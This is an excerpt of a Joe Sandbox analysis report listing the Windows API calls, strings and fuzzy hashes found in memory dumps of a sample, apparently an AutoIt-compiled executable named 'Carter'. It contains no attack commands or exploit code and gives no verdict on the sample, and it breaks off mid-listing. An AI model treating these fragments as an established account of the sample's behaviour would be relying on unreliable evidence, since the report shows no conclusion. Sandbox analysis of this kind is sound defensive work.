                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002CCBEE
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002CCBFE
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 002CCC04
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002CCC25
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002CCC3F
                                                                            • GetWindowRect.USER32(?,?), ref: 002CCC48
                                                                            • SetWindowTextW.USER32(?,?), ref: 002CCCB3
                                                                            • GetDesktopWindow.USER32 ref: 002CCCB9
                                                                            • GetWindowRect.USER32(00000000), ref: 002CCCC0
                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002CCD0C
                                                                            • GetClientRect.USER32(?,?), ref: 002CCD19
                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002CCD3E
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002CCD69
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: 9d2e4ed0a687920057bfa06cf530533532a96633569c9725dff60e46cda6f32b
                                                                            • Instruction ID: 3d03400effdb286bbd590b636d96d65495343e94c42b3a1f5e33abfd5f721d96
                                                                            • Opcode Fuzzy Hash: 9d2e4ed0a687920057bfa06cf530533532a96633569c9725dff60e46cda6f32b
                                                                            • Instruction Fuzzy Hash: A1515F70900709AFDB259FA8CE85F6EBBB9FF04705F10461DE58AA25A0CB75A914CF50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002FA87E
                                                                            • DestroyWindow.USER32(00000000,?), ref: 002FA8F8
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002FA972
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002FA994
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002FA9A7
                                                                            • DestroyWindow.USER32(00000000), ref: 002FA9C9
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00270000,00000000), ref: 002FAA00
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002FAA19
                                                                            • GetDesktopWindow.USER32 ref: 002FAA32
                                                                            • GetWindowRect.USER32(00000000), ref: 002FAA39
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002FAA51
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002FAA69
                                                                              • Part of subcall function 002729AB: GetWindowLongW.USER32(?,000000EB), ref: 002729BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1297703922-3619404913
APIs
  • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
• DragQueryPoint.SHELL32(?,?), ref: 002FCCCF
  • Part of subcall function 002FB1A9: ClientToScreen.USER32(?,?), ref: 002FB1D2
  • Part of subcall function 002FB1A9: GetWindowRect.USER32(?,?), ref: 002FB248
  • Part of subcall function 002FB1A9: PtInRect.USER32(?,?,002FC6BC), ref: 002FB258
• SendMessageW.USER32(?,000000B0,?,?), ref: 002FCD38
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002FCD43
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002FCD66
• _wcscat.LIBCMT ref: 002FCD96
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 002FCDAD
• SendMessageW.USER32(?,000000B0,?,?), ref: 002FCDC6
• SendMessageW.USER32(?,000000B1,?,?), ref: 002FCDDD
• SendMessageW.USER32(?,000000B1,?,?), ref: 002FCDFF
• DragFinish.SHELL32(?), ref: 002FCE06
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002FCEF9
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
APIs
• VariantInit.OLEAUT32(00000000), ref: 002D831A
• VariantCopy.OLEAUT32(00000000,?), ref: 002D8323
• VariantClear.OLEAUT32(00000000), ref: 002D832F
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002D841D
• __swprintf.LIBCMT ref: 002D844D
• VarR8FromDec.OLEAUT32(?,?), ref: 002D8479
• VariantInit.OLEAUT32(?), ref: 002D852A
• SysFreeString.OLEAUT32(?), ref: 002D85BE
• VariantClear.OLEAUT32(?), ref: 002D8618
• VariantClear.OLEAUT32(?), ref: 002D8627
• VariantInit.OLEAUT32(00000000), ref: 002D8665
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
APIs
• CharUpperBuffW.USER32(?,?), ref: 002F4A61
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F4AAC
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
APIs
• GetLocalTime.KERNEL32(?), ref: 002DE31F
• SystemTimeToFileTime.KERNEL32(?,?), ref: 002DE32F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002DE33B
• __wsplitpath.LIBCMT ref: 002DE399
• _wcscat.LIBCMT ref: 002DE3B1
• _wcscat.LIBCMT ref: 002DE3C3
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002DE3D8
• SetCurrentDirectoryW.KERNEL32(?), ref: 002DE3EC
• SetCurrentDirectoryW.KERNEL32(?), ref: 002DE41E
• SetCurrentDirectoryW.KERNEL32(?), ref: 002DE43F
• _wcscpy.LIBCMT ref: 002DE44B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002DE48A
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
APIs
  • Part of subcall function 00271F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00272412,?,00000000,?,?,?,?,00271AA7,00000000,?), ref: 00271F76
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002724AF
• KillTimer.USER32(-00000001,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 0027254A
• DestroyAcceleratorTable.USER32(00000000), ref: 002ABFE7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 002AC018
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 002AC02F
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 002AC04B
• DeleteObject.GDI32(00000000), ref: 002AC05D
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID: h0
• API String ID: 641708696-1319028847
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002DA2C2
  • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002DA2E3
• __swprintf.LIBCMT ref: 002DA33C
• __swprintf.LIBCMT ref: 002DA355
• _wprintf.LIBCMT ref: 002DA3FC
• _wprintf.LIBCMT ref: 002DA41A
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,002BF8B8,00000001,0000138C,00000001,00000002,00000001,?,002E3FF9,00000002), ref: 002D009A
• LoadStringW.USER32(00000000,?,002BF8B8,00000001), ref: 002D00A3
  • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
• GetModuleHandleW.KERNEL32(00000000,00337310,?,00000FFF,?,?,002BF8B8,00000001,0000138C,00000001,00000002,00000001,?,002E3FF9,00000002,00000001), ref: 002D00C5
• LoadStringW.USER32(00000000,?,002BF8B8,00000001), ref: 002D00C8
• __swprintf.LIBCMT ref: 002D0118
• __swprintf.LIBCMT ref: 002D0129
• _wprintf.LIBCMT ref: 002D01D2
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 002D01E9
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
APIs
  • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
  • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
• CharLowerBuffW.USER32(?,?), ref: 002DAA0E
• GetDriveTypeW.KERNEL32 ref: 002DAA5B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002DAAA3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002DAADA
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002DAB08
  • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
                                                                            • Opcode ID: b0d6bcf7a4bb2faec358b5f0e245e74d6cbea5f9e4ba9a32f2888622d1e70ddb
                                                                            • Instruction ID: c7c609db9105b3791094445b4880de64165569f6f467cf944f8601dbad23ffea
                                                                            • Opcode Fuzzy Hash: b0d6bcf7a4bb2faec358b5f0e245e74d6cbea5f9e4ba9a32f2888622d1e70ddb
                                                                            • Instruction Fuzzy Hash: D0517B751242059FC704EF10D881D6AB3F8FF98758F10896EF895972A1DB31AE26CF52
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002DA852
                                                                            • __swprintf.LIBCMT ref: 002DA874
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 002DA8B1
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002DA8D6
                                                                            • _memset.LIBCMT ref: 002DA8F5
                                                                            • _wcsncpy.LIBCMT ref: 002DA931
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002DA966
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002DA971
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 002DA97A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002DA984
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: 6ae8265724a92a68fe1e46b90aadad833640848b804113250ce484e20c854ef3
                                                                            • Instruction ID: b90ba7d983670fb71376967570d06ad1ddb039545d71fce99ecc8938029f7a52
                                                                            • Opcode Fuzzy Hash: 6ae8265724a92a68fe1e46b90aadad833640848b804113250ce484e20c854ef3
                                                                            • Instruction Fuzzy Hash: AD31B27591011AABDB22DFA0DC49FEB73BCEF89700F1041B7F909D2160EB709A558B25
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002F982C,?,?), ref: 002FC0C8
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC0DF
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC0EA
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC0F7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 002FC100
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC10F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002FC118
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC11F
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC130
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00303C7C,?), ref: 002FC149
                                                                            • GlobalFree.KERNEL32(00000000), ref: 002FC159
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 002FC17D
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002FC1A8
                                                                            • DeleteObject.GDI32(00000000), ref: 002FC1D0
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002FC1E6
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: 946591c42dd2df72cfdaefefb9867b80412483db158a9a17b020ed72f5e95cb8
                                                                            • Instruction ID: ac1a25dd85e76ae3312f04499e51f90372eb71cc7b1e1974799e91db32ea4d2e
                                                                            • Opcode Fuzzy Hash: 946591c42dd2df72cfdaefefb9867b80412483db158a9a17b020ed72f5e95cb8
                                                                            • Instruction Fuzzy Hash: 4C417B74501209EFCB268F64CC88FABBBBCEF89751F104069F90AE7260CB319951CB60
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002FC8A4
                                                                            • GetFocus.USER32 ref: 002FC8B4
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 002FC8BF
                                                                            • _memset.LIBCMT ref: 002FC9EA
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002FCA15
                                                                            • GetMenuItemCount.USER32(?), ref: 002FCA35
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 002FCA48
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002FCA7C
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002FCAC4
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002FCAFC
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002FCB31
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1296962147-4108050209
                                                                            • Opcode ID: 01e2cfef103f64c2f5f5c10bf0e2486a9eea92a90a9e24e5df2560fe1b657847
                                                                            • Instruction ID: e4d4844aa4a75b3410e729f6357ad44e49dd62d7857fa33eabb30babb8b4f4b2
                                                                            • Opcode Fuzzy Hash: 01e2cfef103f64c2f5f5c10bf0e2486a9eea92a90a9e24e5df2560fe1b657847
                                                                            • Instruction Fuzzy Hash: 4A819E7011830E9FD715CF14CA85A7ABBE8FB88394F20492EFA9593291C770D925CF92
                                                                            APIs
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C8E3C
                                                                              • Part of subcall function 002C8E20: GetLastError.KERNEL32(?,002C8900,?,?,?), ref: 002C8E46
                                                                              • Part of subcall function 002C8E20: GetProcessHeap.KERNEL32(00000008,?,?,002C8900,?,?,?), ref: 002C8E55
                                                                              • Part of subcall function 002C8E20: HeapAlloc.KERNEL32(00000000,?,002C8900,?,?,?), ref: 002C8E5C
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C8E73
                                                                              • Part of subcall function 002C8EBD: GetProcessHeap.KERNEL32(00000008,002C8916,00000000,00000000,?,002C8916,?), ref: 002C8EC9
                                                                              • Part of subcall function 002C8EBD: HeapAlloc.KERNEL32(00000000,?,002C8916,?), ref: 002C8ED0
                                                                              • Part of subcall function 002C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002C8916,?), ref: 002C8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C8B2E
                                                                            • _memset.LIBCMT ref: 002C8B43
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C8B62
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C8B73
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002C8BB0
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C8BCC
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C8BE9
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002C8BF8
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002C8BFF
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C8C20
                                                                            • CopySid.ADVAPI32(00000000), ref: 002C8C27
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C8C58
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C8C7E
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C8C92
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: 40478368af88b47f53e5d3e5d800b60f4b525aa8ca24ed727c21c2a4d867c9d1
                                                                            • Instruction ID: c6ca0c321aa9a70842f5de1004b81f4756adb24701de8c92c1707881165ba87b
                                                                            • Opcode Fuzzy Hash: 40478368af88b47f53e5d3e5d800b60f4b525aa8ca24ed727c21c2a4d867c9d1
                                                                            • Instruction Fuzzy Hash: C861587591120AAFDF19DFA4DC44FEEBB79FF04300F04826AF915A6290DB319A25CB60
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 002E7A79
                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002E7A85
                                                                            • CreateCompatibleDC.GDI32(?), ref: 002E7A91
                                                                            • SelectObject.GDI32(00000000,?), ref: 002E7A9E
                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002E7AF2
                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002E7B2E
                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002E7B52
                                                                            • SelectObject.GDI32(00000006,?), ref: 002E7B5A
                                                                            • DeleteObject.GDI32(?), ref: 002E7B63
                                                                            • DeleteDC.GDI32(00000006), ref: 002E7B6A
                                                                            • ReleaseDC.USER32(00000000,?), ref: 002E7B75
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: 58e189a5773dbb60fef7ddc55f7cb676e5168fac3f10b718e1cd12155a8d14b8
                                                                            • Instruction ID: 713aaba1590dd1ab87e97d6edd13a74d08956c57270ee96f60fc7acfd14721f6
                                                                            • Opcode Fuzzy Hash: 58e189a5773dbb60fef7ddc55f7cb676e5168fac3f10b718e1cd12155a8d14b8
                                                                            • Instruction Fuzzy Hash: B5515871944349EFCB15CFA9CC84FAEBBB9EF48310F14842EF94AA7210D731A9508B60
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002DA4D4
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 002DA4F6
                                                                            • __swprintf.LIBCMT ref: 002DA54F
                                                                            • __swprintf.LIBCMT ref: 002DA568
                                                                            • _wprintf.LIBCMT ref: 002DA61E
                                                                            • _wprintf.LIBCMT ref: 002DA63C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-2391861430
                                                                            • Opcode ID: e33d9956b98d3a08f70adb210fc88a6069b0d8ed63f808832d40d22dde947bfd
                                                                            • Instruction ID: 7055e1e53a83e796251bc3a8f92c21d9f48b96045bd6d6e0614ef07ae161bbe7
                                                                            • Opcode Fuzzy Hash: e33d9956b98d3a08f70adb210fc88a6069b0d8ed63f808832d40d22dde947bfd
                                                                            • Instruction Fuzzy Hash: A1516A71822119ABCF15EBA0DD86EEEB77DAF04340F100166F505A21E2EB316E79CF91
                                                                            APIs
                                                                              • Part of subcall function 002D951A: __time64.LIBCMT ref: 002D9524
                                                                              • Part of subcall function 00284A8C: _fseek.LIBCMT ref: 00284AA4
                                                                            • __wsplitpath.LIBCMT ref: 002D97EF
                                                                              • Part of subcall function 0029431E: __wsplitpath_helper.LIBCMT ref: 0029435E
                                                                            • _wcscpy.LIBCMT ref: 002D9802
                                                                            • _wcscat.LIBCMT ref: 002D9815
                                                                            • __wsplitpath.LIBCMT ref: 002D983A
                                                                            • _wcscat.LIBCMT ref: 002D9850
                                                                            • _wcscat.LIBCMT ref: 002D9863
                                                                              • Part of subcall function 002D9560: _memmove.LIBCMT ref: 002D9599
                                                                              • Part of subcall function 002D9560: _memmove.LIBCMT ref: 002D95A8
                                                                            • _wcscmp.LIBCMT ref: 002D97AA
